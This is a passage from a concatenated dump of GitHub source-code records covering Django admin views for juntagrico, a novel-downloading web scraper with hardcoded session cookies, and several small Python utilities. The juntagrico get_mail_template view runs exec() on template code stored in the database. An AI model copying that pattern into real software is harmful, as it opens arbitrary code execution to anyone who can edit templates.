mail_url)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef mails_depot(request):\n return my_mails_intern(request, 'mail-depot-send')\n\n\n@permission_required('juntagrico.is_area_admin')\ndef mails_area(request):\n return my_mails_intern(request, 'mail-area-send')\n\n\n@any_permission_required('juntagrico.is_area_admin', 'juntagrico.can_send_mails')\ndef mails_job(request):\n return my_mails_intern(request, 'mail-job-send')\n\n\ndef my_mails_intern(request, mail_url, error_message=None):\n renderdict = {\n 'recipient_type': request.POST.get('recipient_type'),\n 'recipient_type_detail': request.POST.get('recipient_type_detail'),\n 'recipients': request.POST.get('recipients'),\n 'recipients_count': int(request.POST.get('recipients_count') or 0),\n 'filter_value': request.POST.get('filter_value'),\n 'mail_subject': request.POST.get('subject'),\n 'mail_message': request.POST.get('message'),\n 'mail_url': mail_url,\n 'email': request.user.member.email,\n 'error_message': error_message,\n 'templates': MailTemplateDao.all_templates(),\n 'can_use_general_email': request.user.has_perm('juntagrico.can_use_general_email'),\n 'can_load_templates': request.user.has_perm('juntagrico.can_load_templates')\n }\n return render(request, 'mail_sender.html', renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_members', 'juntagrico.change_member')\ndef filters_active(request):\n members = MemberDao.active_members()\n renderdict = {\n 'members': members,\n 'title': _('Alle aktiven {}').format(Config.vocabulary('member_pl'))\n }\n return render(request, 'members.html', renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_members', 'juntagrico.change_member')\ndef filters(request):\n members = MemberDao.all_members()\n renderdict = {\n 'members': members,\n 'title': _('Alle {}').format(Config.vocabulary('member_pl'))\n }\n return render(request, 'members.html', renderdict)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef filters_depot(request, depot_id):\n depot = get_object_or_404(Depot, id=int(depot_id), contact=request.user.member)\n members = MemberDao.member_with_active_subscription_for_depot(depot)\n renderdict = {\n 'can_send_mails': True,\n 'members': members,\n 'mail_url': 'mail-depot',\n 'title': _('Alle aktiven {} im {} {}').format(Config.vocabulary('member_pl'), Config.vocabulary('depot'), depot.name)\n }\n return render(request, 'members.html', renderdict)\n\n\n@permission_required('juntagrico.is_area_admin')\ndef filters_area(request, area_id):\n area = get_object_or_404(ActivityArea, id=int(area_id), coordinator=request.user.member)\n members = MemberDao.members_in_area(area)\n renderdict = {\n 'can_send_mails': True,\n 'members': members,\n 'mail_url': 'mail-area',\n 'title': _('Alle aktiven {} im Tätigkeitsbereich {}').format(Config.vocabulary('member_pl'), area.name)\n }\n return render(request, 'members.html', renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_subscriptions', 'juntagrico.change_subscription')\ndef subscriptions(request):\n renderdict = {\n 'subscriptions': SubscriptionDao.all_active_subscritions(),\n 'title': _('Alle aktiven {} im Überblick').format(Config.vocabulary('subscription_pl'))\n }\n\n return render(request, 'subscriptions.html', renderdict)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef filter_subscriptions_depot(request, depot_id):\n depot = get_object_or_404(Depot, id=int(depot_id))\n renderdict = {\n 'can_send_mails': True,\n 'subscriptions': SubscriptionDao.active_subscritions_by_depot(depot),\n 'mail_url': 'mail-depot',\n 'title': _('Alle aktiven {} im {} {}').format(Config.vocabulary('subscription_pl'), Config.vocabulary('depot'), depot.name)\n }\n\n return render(request, 'subscriptions.html', renderdict)\n\n\n@permission_required('juntagrico.can_view_lists')\ndef depotlist(request):\n return return_pdf_http('depotlist.pdf')\n\n\n@permission_required('juntagrico.can_view_lists')\ndef depot_overview(request):\n return return_pdf_http('depot_overview.pdf')\n\n\n@permission_required('juntagrico.can_view_lists')\ndef amount_overview(request):\n return return_pdf_http('amount_overview.pdf')\n\n\n@permission_required('juntagrico.change_subscription')\ndef future(request):\n subscriptionsizes = []\n subscription_lines = dict({})\n for subscription_size in SubscriptionSizeDao.all_sizes_ordered():\n subscriptionsizes.append(subscription_size.id)\n subscription_lines[subscription_size.id] = {\n 'name': subscription_size.product.name + '-' + subscription_size.name,\n 'future': 0,\n 'now': 0\n }\n for subscription in SubscriptionDao.all_active_subscritions():\n for subscription_size in subscriptionsizes:\n subscription_lines[subscription_size]['now'] += subscription.subscription_amount(\n subscription_size)\n\n for subscription in SubscriptionDao.future_subscriptions():\n for subscription_size in subscriptionsizes:\n subscription_lines[subscription_size]['future'] += subscription.subscription_amount_future(\n subscription_size)\n\n renderdict = {\n 'changed': request.GET.get('changed'),\n 'subscription_lines': iter(subscription_lines.values()),\n }\n return render(request, 'future.html', renderdict)\n\n\n@permission_required('juntagrico.can_load_templates')\ndef get_mail_template(request, template_id):\n renderdict = {}\n template = MailTemplateDao.template_by_id(template_id)\n exec(template.code)\n t = Template(template.template)\n c = Context(renderdict)\n result = t.render(c)\n return HttpResponse(result)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_members_filter(request):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=Report.xlsx'\n output = BytesIO()\n workbook = Workbook(output)\n worksheet_s = workbook.add_worksheet(Config.vocabulary('member_pl'))\n\n worksheet_s.write_string(0, 0, str(_('Name')))\n worksheet_s.write_string(0, 1, str(Config.vocabulary('assignment')))\n worksheet_s.write_string(\n 0, 2, str(Config.vocabulary('assignment') + ' ' + _('Kernbereich')))\n worksheet_s.write_string(0, 3, str(_('Taetigkeitsbereiche')))\n worksheet_s.write_string(0, 4, str(_('Depot')))\n worksheet_s.write_string(0, 5, str(_('Email')))\n worksheet_s.write_string(0, 6, str(_('Telefon')))\n worksheet_s.write_string(0, 7, str(_('Mobile')))\n members = MemberDao.members_with_assignments_count()\n\n row = 1\n for member in members:\n member.all_areas = ''\n for area in member.areas.all():\n member.all_areas = member.all_areas + area.name + ' '\n if member.all_areas == '':\n member.all_areas = str(_('-Kein Tätigkeitsbereich-'))\n\n member.depot_name = str(_('Kein Depot definiert'))\n if member.subscription_current is not None:\n member.depot_name = member.subscription_current.depot.name\n full_name = member.first_name + ' ' + member.last_name\n worksheet_s.write_string(row, 0, full_name)\n worksheet_s.write(row, 1, member.assignment_count)\n worksheet_s.write(row, 2, member.core_assignment_count)\n worksheet_s.write_string(row, 3, member.all_areas)\n worksheet_s.write_string(row, 4, member.depot_name)\n worksheet_s.write_string(row, 5, member.email)\n worksheet_s.write_string(row, 6, member.phone)\n if member.mobile_phone is not None:\n worksheet_s.write_string(row, 7, member.mobile_phone)\n row += 1\n\n workbook.close()\n xlsx_data = output.getvalue()\n response.write(xlsx_data)\n return response\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_subscriptions(request):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=Report.xlsx'\n output = BytesIO()\n workbook = Workbook(output)\n worksheet_s = workbook.add_worksheet(Config.vocabulary('subscription_pl'))\n\n worksheet_s.write_string(0, 0, str(_('Übersicht')))\n worksheet_s.write_string(0, 1, str(_('HauptbezieherIn')))\n worksheet_s.write_string(0, 2, str(_('HauptbezieherInEmail')))\n worksheet_s.write_string(0, 3, str(_('HauptbezieherInTelefon')))\n worksheet_s.write_string(0, 4, str(_('HauptbezieherInMobile')))\n worksheet_s.write_string(0, 5, str(_('Weitere BezieherInnen')))\n worksheet_s.write_string(0, 6, str(_('Status')))\n worksheet_s.write_string(0, 7, str(_('Depot')))\n worksheet_s.write_string(0, 8, str(Config.vocabulary('assignment')))\n worksheet_s.write_string(0, 9, str(_('{} soll'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 10, str(_('{} status(%)'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 11, str(_('{} Kernbereich'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 12, str(_('{} Kernbereich soll'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 13, str(_('{} Kernbereich status(%)'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 14, str(_('Preis')))\n\n subs = subscriptions_with_assignments(SubscriptionDao.all_subscritions())\n\n row = 1\n for sub in subs:\n primary_member = sub['subscription'].primary_member\n if primary_member is not None:\n name = primary_member.get_name()\n email = primary_member.email\n phone = primary_member.phone or ''\n mobile = primary_member.mobile_phone or ''\n else:\n name = ''\n email = ''\n phone = ''\n mobile = ''\n\n worksheet_s.write_string(row, 0, sub['subscription'].size)\n worksheet_s.write_string(row, 1, name)\n worksheet_s.write_string(row, 2, email)\n worksheet_s.write_string(row, 3, phone)\n worksheet_s.write_string(row, 4, mobile)\n worksheet_s.write_string(row, 5, sub['subscription'].other_recipients_names)\n worksheet_s.write_string(row, 6, sub['subscription'].state_text)\n worksheet_s.write_string(row, 7, sub['subscription'].depot.name)\n worksheet_s.write(row, 8, sub.get('assignments'))\n worksheet_s.write(row, 9, sub['subscription'].required_assignments)\n worksheet_s.write(row, 10, sub.get('assignments_progress'))\n worksheet_s.write(row, 11, sub.get('core_assignments'))\n worksheet_s.write(row, 12, sub['subscription'].required_core_assignments)\n worksheet_s.write(row, 13, sub.get('core_assignments_progress'))\n worksheet_s.write(row, 14, sub['subscription'].price)\n row += 1\n\n workbook.close()\n xlsx_data = output.getvalue()\n response.write(xlsx_data)\n return response\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_members(request):\n fields = [\n 'first_name',\n 'last_name',\n 'email',\n 'addr_street',\n 'addr_zipcode',\n 'addr_location',\n 'birthday',\n 'phone',\n 'mobile_phone',\n 'confirmed',\n 'reachable_by_email',\n 'deactivation_date',\n ]\n return generate_excel(fields, Member)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_shares(request):\n fields = [\n 'id',\n 'number',\n 'paid_date',\n 'issue_date',\n 'booking_date',\n 'cancelled_date',\n 'termination_date',\n 'payback_date',\n 'notes',\n 'member.first_name',\n 'member.last_name',\n 'member.email',\n ]\n return generate_excel(fields, Share)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef export(request):\n return render(request, 'export.html', {})\n\n\n@permission_required('juntagrico.change_subscription')\ndef waitinglist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionDao.not_started_subscriptions(), render_dict,\n 'management_lists/waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscription')\ndef canceledlist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionDao.canceled_subscriptions(), render_dict,\n 'management_lists/canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef part_waitinglist(request):\n render_dict = get_changedate(request)\n changedlist = SubscriptionPartDao.waiting_parts_for_active_subscriptions()\n return subscription_management_list(changedlist, render_dict, 'management_lists/part_waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef part_canceledlist(request):\n render_dict = get_changedate(request)\n changedlist = SubscriptionPartDao.canceled_parts_for_active_subscriptions()\n return subscription_management_list(changedlist, render_dict, 'management_lists/part_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef extra_waitinglist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionPartDao.waiting_extra_subs(), render_dict,\n 'management_lists/extra_waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef extra_canceledlist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionPartDao.canceled_extra_subs(), render_dict,\n 'management_lists/extra_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_share')\ndef share_canceledlist(request):\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(ShareDao.canceled_shares(), render_dict,\n 'management_lists/share_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_member')\ndef member_canceledlist(request):\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(MemberDao.canceled_members(), render_dict,\n 'management_lists/member_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_member')\ndef deactivate_member(request, member_id):\n member = get_object_or_404(Member, id=member_id)\n member.deactivation_date = timezone.now().date()\n member.save()\n return return_to_previous_location(request)\n\n\ndef set_change_date(request):\n if request.method != 'POST':\n raise Http404\n raw_date = request.POST.get('date')\n try:\n date = timezone.datetime.strptime(raw_date, '%m/%d/%Y').date()\n request.session['changedate'] = date\n except ValueError:\n return error_page(request, _('Bitte gib ein Datum im Format MM/TT/JJJJ ein.'))\n return return_to_previous_location(request)\n\n\ndef unset_change_date(request):\n request.session['changedate'] = None\n return return_to_previous_location(request)\n\n\n@permission_required('juntagrico.change_subscription')\ndef sub_inconsistencies(request):\n management_list = []\n for sub in SubscriptionDao.all_subscritions():\n try:\n sub.clean()\n for part in sub.parts.all():\n part.clean()\n for member in sub.subscriptionmembership_set.all():\n member.clean()\n except Exception as e:\n management_list.append({'subscription': sub, 'error': e})\n if sub.primary_member is None:\n management_list.append({'subscription': sub, 'error': _('Haubtbezieher ist nicht gesetzt')})\n render_dict = {'change_date_disabled': True,\n 'email_form_disabled': True}\n return subscription_management_list(management_list, render_dict,\n 'management_lists/inconsistent.html', request)\n\n\n@permission_required('juntagrico.change_assignment')\ndef assignments(request):\n management_list = subscriptions_with_assignments(SubscriptionDao.all_active_subscritions())\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(management_list, render_dict,\n 'management_lists/assignments.html', request)\n\n\n@login_required\ndef versions(request):\n versions = {'juntagrico': version}\n versions.update(addons.config.get_versions())\n render_dict = {'versions': versions}\n return render(request, 'versions.html', render_dict)\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":20719,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"} +{"seq_id":"23567274574","text":"import requests\nimport re\nfrom requests_html import UserAgent\nimport parsel\nimport os\nimport pandas as pd\nimport threading\nfrom tqdm import tqdm # 进度条\n\n\n# 发生请求\ndef get_response(html_url):\n ua = UserAgent().random\n response = requests.get(url=html_url, headers={'user-agent' : ua})\n response.encoding = response.apparent_encoding\n return response\n\n# 获得小说每个章节的url地址\ndef get_novel_url(html_url):\n response = get_response(html_url)\n seltector = parsel.Selector(response.text)\n # 前9章是推荐章节,我们不需要\n herf = seltector.css('#list dd a::attr(href)').getall()[9:]\n # herf.reverse()\n novel_urls =[]\n for url in herf:\n novel_url = 'http://www.biqugse.com' + url \n novel_urls.append(novel_url)\n return novel_urls\n\n\n# 找到小说文章并保存\ndef get_novel_content_and_save(name, novel_url): \n response = get_response(novel_url)\n selector = parsel.Selector(response.text)\n title = re.findall('

(.*?)

',response.text)[0]\n # print(title)\n content_list = selector.css('#content::text').getall()\n content = '\\n'.join(content_list)\n path = os.path.dirname(__file__)\n with open(path + '\\\\' + name + '.txt', mode='a', encoding='utf-8') as f:\n f.write(title)\n f.write('\\n')\n f.writelines(content)\n f.write('\\n\\n')\n\n\n# 搜索功能\ndef serch(book_name):\n lis = []\n ua = UserAgent().random\n data = {'key': book_name}\n # Cookies = input('请输入Cookies')\n header = {\n 'user-agent' : ua,\n 'Cookie': 'obj=1; 796ab53acf966fbacf8f078ecd10a9ce=a%3A1%3A%7Bi%3A28801%3Bs%3A24%3A%2251387311%7C%2A%7C%E7%AC%AC1%E7%AB%A0%E7%A7%9F%E6%88%BF%22%3B%7D; PHPSESSID=kigrt4hfuvmpvs08iopmjn1er1; eee124c39a6d9bc42108981154c5ab0c=1; Hm_lvt_7a41ef5a4df2b47849f9945ac428a3df=1668612958,1668671534,1668769884,1668935895; Hm_lpvt_7a41ef5a4df2b47849f9945ac428a3df=1668935898'\n }\n response = requests.post(url='http://www.biqugse.com/case.php?m=search', headers=header,data=data)\n response.encoding = response.apparent_encoding\n seltector = parsel.Selector(response.text) #转换为Selector对象进行css搜索\n books_allinformation = seltector.css('#newscontent div.l ul li').getall() # 搜索书籍信息\n # 遍历书籍信息进行保存\n if books_allinformation:\n for book_information in books_allinformation:\n # 将字符串转化为Selector对象\n book_information = parsel.Selector(book_information) \n novel_name = book_information.css('span.s2 a::text').get()\n novel_id = book_information.css('span.s2 a::attr(href)').get().replace('/', '')\n author = book_information.css('span.s4::text').get()\n dit = {\n '书名':novel_name,\n '作者':author,\n '书ID':novel_id\n } \n lis.append(dit) \n print(f'共搜索到{len(lis)}书籍')\n search_result = pd.DataFrame(lis)\n print(search_result) \n num = input('请输入你要下载小说的序号:\\n') \n num_id = lis[int(num)]['书ID']\n book_url = 'http://www.biqugse.com/' + num_id + '/'\n # print(book_url)\n return book_url\n else:\n print('未查找到书籍!\\n')\n\n \n\ndef main():\n while True:\n print(\"输入'0'退出程序\\n\")\n book_name = input('请输入书名:\\n')\n if book_name == '0':\n break\n book_url = serch(book_name)\n if book_url == None:\n continue\n response = get_response(book_url)\n book_name = re.findall('

(.*?)

',response.text)[0]\n # print(book_name)\n herf = get_novel_url(book_url)\n #判断小说文件是否重复,若重复,删除\n path = os.path.dirname(__file__)\n if os.path.exists(path + '\\\\' + book_name + '.txt'):\n os.remove(path + '\\\\' + book_name + '.txt')\n for index in tqdm(herf):\n get_novel_content_and_save(name=book_name, novel_url=index)\n # time.sleep(0.1)\n print(f'{book_name}已经下载完成了:')\n\nif __name__ =='__main__':\n main()","repo_name":"dandan4188/web_crawler","sub_path":"Get_book_1.0.py","file_name":"Get_book_1.0.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36357748380","text":"import sqlite3\n\nSQL_SCHEME_FILE = 'schema.sql'\n\nDEVICE_TITLES = ['main power', 'NOX', 'O2', 'alarm', 'beacon', 'ignite']\nACTIVATIONS = [0] * len(DEVICE_TITLES)\nCHANNELS = list(range(1, len(DEVICE_TITLES) + 1))\n\ndeviceStartData = zip(DEVICE_TITLES, CHANNELS)\noutputsStartData = zip(CHANNELS, ACTIVATIONS)\n\n# connection matrix for the device tree\ngraphStartData = [ [0,0,0,0,1,0],\n [0,0,0,0,0,0],\n [0,1,0,0,0,0],\n [0,0,1,0,0,1],\n [0,0,0,1,0,0],\n [0,0,0,0,0,0]]\n\nWARNING = \"\"\"RUNNING THIS SCRIPT WILL DELETE ANY DEVICES THAT HAVE BEEN ADDED AND RESET CHANNELS TO A DEFAULT STATE.\n- Type \"reset\" to reset the database \n- or type anything else to stop.\n\"\"\"\n\nanswer = input(WARNING)\nprint(answer)\nshouldContinue = answer.strip().lower() == \"reset\"\n\nif shouldContinue:\n print(\"resetting...\")\n conn = sqlite3.connect('database.db')\n conn.row_factory = sqlite3.Row #python dicts\n\n with open(SQL_SCHEME_FILE) as f:\n conn.executescript(f.read())\n\n cur = conn.cursor()\n \n cur.executemany(\"INSERT INTO devices (title, channel) VALUES (?, ?)\", deviceStartData)\n cur.executemany(\"INSERT INTO outputs (channel, activation) VALUES (?, ?)\", outputsStartData)\n \n# columns\n cur.execute(\"SELECT id from devices\")\n deviceIDs = [row['id'] for row in cur.fetchall()]\n for deviceID in deviceIDs:\n cur.execute(f\"ALTER TABLE graph ADD COLUMN '{deviceID}' INTEGER DEFAULT 0 NOT NULL\")\n \n cur.executemany(\"INSERT INTO graph VALUES(?,?,?,?,?,?,?)\", [[a] + b for a,b in zip(deviceIDs, graphStartData)])\n \n conn.commit()\n conn.close()\nelse:\n print(\"stopping.\")","repo_name":"Jamesalambert/control_board","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9579586618","text":"# -*-coding:utf-8-*-\r\n# @author: Yiqin Qiu\r\n# @email: barryxxz@stu.hqu.edu.cn\r\n\r\nfrom tensorflow.keras.layers import *\r\nimport tensorflow.keras.backend as K\r\n\r\n\r\nclass OurLayer(Layer):\r\n def reuse(self, layer, *args, **kwargs):\r\n if not layer.built:\r\n if len(args) > 0:\r\n inputs = args[0]\r\n else:\r\n inputs = kwargs['inputs']\r\n if isinstance(inputs, list):\r\n input_shape = [K.int_shape(x) for x in inputs]\r\n else:\r\n input_shape = K.int_shape(inputs)\r\n layer.build(input_shape)\r\n outputs = layer.call(*args, **kwargs)\r\n for w in layer.trainable_weights:\r\n if w not in self.trainable_weights:\r\n self.trainable_weights.append(w)\r\n for w in layer.non_trainable_weights:\r\n if w not in self.non_trainable_weights:\r\n self.non_trainable_weights.append(w)\r\n for u in layer.updates:\r\n if not hasattr(self, '_updates'):\r\n self._updates = []\r\n if u not in self._updates:\r\n self._updates.append(u)\r\n return outputs\r\n\r\n\r\nclass TrainablePositionEmbedding(OurLayer):\r\n def __init__(self, maxlen, v_dim, merge_mode='add', **kwargs):\r\n super(TrainablePositionEmbedding, self).__init__(**kwargs)\r\n self.maxlen = maxlen\r\n self.v_dim = v_dim\r\n self.merge_mode = merge_mode\r\n\r\n def build(self, input_shape):\r\n super(TrainablePositionEmbedding, self).build(input_shape)\r\n self.embeddings = self.add_weight(\r\n name='embeddings',\r\n shape=(self.maxlen, self.v_dim),\r\n initializer='zeros'\r\n )\r\n\r\n def call(self, inputs):\r\n if isinstance(inputs, list):\r\n x, r = inputs\r\n else:\r\n x, r = inputs, 0\r\n pid = K.arange(start=0, stop=K.shape(x)[1])\r\n pid = K.expand_dims(pid, 0)\r\n pid = K.tile(pid, [K.shape(x)[0], 1])\r\n pid = K.abs(pid - K.cast(r, 'int32'))\r\n pv = K.gather(self.embeddings, pid)\r\n if self.merge_mode == 'add':\r\n return pv + x\r\n else:\r\n return K.concatenate([x, pv])\r\n\r\n def compute_output_shape(self, input_shape):\r\n if self.merge_mode == 'add':\r\n return input_shape\r\n else:\r\n return (input_shape[0], input_shape[1], input_shape[2] + self.v_dim)\r\n","repo_name":"BarryxxZ/SepSteNetwithDPES","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20128020678","text":"#!/usr/bin/env python3\n\"\"\"\n[GRM] Complex example of multiple subplots and series\n\"\"\"\nimport sys\nimport numpy as np\nimport grm\n\nx = np.linspace(-1, 1, 40)[:, np.newaxis, np.newaxis]\ny = np.linspace(-1, 1, 40)[np.newaxis, :, np.newaxis]\nz = np.linspace(-1, 1, 40)[np.newaxis, np.newaxis, :]\nv = 1 - ((x - 0.5) ** 2 + y ** 2 + z ** 2) ** 0.5\nv2 = 1 - ((x + 0.5) ** 2 + y ** 2 + z ** 2) ** 0.5\nv3 = np.zeros((40, 40, 40))\nv4 = np.zeros((40, 40, 40))\nv5 = np.zeros((40, 40, 40))\nv3[0, :, :] = 1\nv4[:, 0, :] = 1\nv5[:, :, 0] = 1\ngrm.plot.plot(\n grm.args.new(\n {\n \"subplots\": [\n {\n \"x\": np.linspace(0, 2, 100),\n \"y\": np.sin(np.linspace(0, 2, 100)),\n \"title\": \"Plot of sin from y = 0 to 2\",\n \"subplot\": [0, 1, 0.5, 1],\n },\n {\n \"series\": [\n {\"c\": v3, \"isovalue\": 0.5, \"foreground_color\": [0.8, 0.3, 0.2]},\n {\"c\": v4, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.8, 0.3]},\n {\"c\": v5, \"isovalue\": 0.5, \"foreground_color\": [0.6, 0.3, 0.8]},\n {\"c\": v2, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.8, 0.3]},\n {\"c\": v, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.3, 0.8]},\n ],\n \"kind\": \"isosurface\",\n # \"rotation\": 30.0,\n \"title\": \"Example of multi-series Isosurface\",\n \"subplot\": [0, 0.5, 0, 0.5],\n },\n {\n \"c\": np.maximum(v, v2),\n \"isovalue\": 0.5,\n \"foreground_color\": [0.2, 0.5, 0.3],\n \"title\": \"Single series isosurface\",\n \"subplot\": [0.5, 1, 0, 0.5],\n \"kind\": \"isosurface\",\n },\n ],\n \"size\": [1000, 800],\n }\n )\n)\n\nprint(\"press enter to quit\")\nsys.stdin.read(1)\n","repo_name":"sciapp/python-gr","sub_path":"examples/grm/isovalue-multiseries-multiplot.py","file_name":"isovalue-multiseries-multiplot.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"11857978890","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom peewee import PrimaryKeyField, CharField, DateTimeField, IntegerField, ForeignKeyField\nfrom base.base_module import BaseModel\n\nclass FunctionRightType(BaseModel):\n class Meta:\n db_table = 'ios_base_fucntion_right_type'\n\n type_id = PrimaryKeyField()\n name = CharField()\n icon = CharField()\n index = IntegerField(default=0)\n status = IntegerField(default=1)\n gen_time = DateTimeField(default=datetime.datetime.now)\n\nclass FunctionRight(BaseModel):\n class Meta:\n db_table = 'ios_base_function_right'\n\n function_right_id = PrimaryKeyField() # 功能权限ID\n name = CharField() # 功能权限名称\n path = CharField() # 功能路径\n status = IntegerField(default=1) # 状态 0-无效 1-有效\n description = CharField(null=True) # 功能权限描述\n gen_time = DateTimeField(default=datetime.datetime.now) # 创建时间\n icon = CharField() # 图标\n index = IntegerField() # 获取的时候按照index升序排列.\n\n type = ForeignKeyField(FunctionRightType)\n\n\n","repo_name":"guoshengkang/demand-forcast","sub_path":"cdf_v2/model/base/function_right.py","file_name":"function_right.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16365186809","text":"import os\nimport uuid\n\nfrom typing import Tuple, Union, Optional\nfrom pathlib import Path, _ignore_error as pathlib_ignore_error # type: ignore # noqa\n\nimport aiofiles.os\n\nfrom .config import settings\n\n\ndef equalize_lists(left_items: list[Union[int, None]],\n right_items: list[Union[int, None]]) -> Tuple[Optional[int], Optional[str]]:\n \"\"\"\n Calculate needed operation\n return: Number and action: 'removed' or 'added'. or None, None\n \"\"\"\n if set(left_items) == set(right_items):\n return None, None\n difference: set = set(left_items) ^ set(right_items)\n num = list(difference)[0]\n action = 'removed' if num in left_items else 'added'\n return num, action\n\n\nasync def create_file_path(filename: str) -> str:\n file_path = f'{settings.media_dir}/{filename}'\n if await path_exists(file_path):\n name, ext = os.path.splitext(filename)\n file_path = f'{settings.media_dir}/{name}_{str(uuid.uuid4())[:8]}{ext}'\n return file_path\n\n\nasync def path_exists(path: Union[Path, str]) -> bool:\n try:\n await aiofiles.os.stat(str(path))\n except OSError as e:\n if not pathlib_ignore_error(e):\n raise\n return False\n except ValueError:\n return False\n return True\n","repo_name":"mitrofun/service-diff-of-set","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72985186433","text":"import grok\nimport zope.component\n\n#from uvcsite.browser.widgets import UvcRadioFieldWidget, UvcMultiChoiceFieldWidget\nfrom uvc.adhoc.utils import AdHocIdReference\nfrom zope.component.interfaces import IComponents\nfrom uvc.adhoc.auth.handler import AdHocAuthenticator\nfrom zope.pluggableauth import PluggableAuthentication\nfrom grokcore.registries import create_components_registry\nfrom uvc.adhoc.interfaces import IAdHocApplication, IAdHocIdReference\nfrom zope.pluggableauth.interfaces import IAuthenticatorPlugin\nfrom zope.authentication.interfaces import IAuthentication\nfrom zeam.form.ztk import customize\nfrom zope.schema.interfaces import IDate\nfrom zeam.form.ztk.widgets.choice import ChoiceField\nfrom .interfaces import IAdHocLayer\nfrom zope.interface import Interface\n\n\nadhocRegistry = create_components_registry(\n name=\"adhocRegistry\",\n bases=(zope.component.globalSiteManager, ),\n)\n\n\ngrok.global_utility(\n adhocRegistry,\n name=\"adhocRegistry\",\n provides=IComponents,\n direct=True,\n)\n\n\ndef setup_pau(PAU):\n PAU.authenticatorPlugins = ('principals', )\n PAU.credentialsPlugins = (\n \"cookies\",\n \"Zope Realm Basic-Auth\",\n \"No Challenge if Authenticated\")\n\n\ndef intid_factory():\n return AdHocIdReference(attribute='docid')\n\n\nclass Dokumente(grok.Container):\n pass\n\n\nclass AdHocApp(grok.Application, grok.Container):\n grok.implements(IAdHocApplication)\n\n grok.local_utility(AdHocAuthenticator,\n name=u\"principals\",\n provides=IAuthenticatorPlugin)\n\n grok.local_utility(PluggableAuthentication,\n IAuthentication,\n public=True,\n setup=setup_pau)\n\n grok.local_utility(intid_factory,\n IAdHocIdReference,\n public=True)\n\n def __init__(self):\n super(AdHocApp, self).__init__()\n self['dokumente'] = Dokumente()\n\n def getSiteManager(self):\n current = super(AdHocApp, self).getSiteManager()\n #import pdb; pdb.set_trace() \n #return adhocRegistry\n if adhocRegistry not in current.__bases__:\n adhocRegistry.__bases__ = tuple([x for x in adhocRegistry.__bases__ if x.__hash__() != zope.component.globalSiteManager.__hash__()])\n current.__bases__ = (adhocRegistry,) + current.__bases__ \n else:\n if current.__bases__.index(adhocRegistry) == 1:\n current.__bases__ = current.__bases__[::-1]\n return current\n\n\n@customize(origin=IDate)\ndef customize_size(field):\n field.valueLength = 'medium'\n\n\n#class UvcRadioFieldWidget(UvcRadioFieldWidget):\n# grok.adapts(ChoiceField, Interface, IAdHocLayer)\n\n\n#class UvcMultiChoiceFieldWidget(UvcMultiChoiceFieldWidget):\n# grok.adapts(ChoiceField, Interface, IAdHocLayer)\n","repo_name":"novareto/uvc.adhoc","sub_path":"src/uvc/adhoc/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10536683237","text":"def swap_case(test):\n test1 = \"\"\n for i in test:\n if i.islower():\n i = i.upper()\n test1 = test1 + i\n else:\n i = i.lower()\n test1 = test1 + i\n return 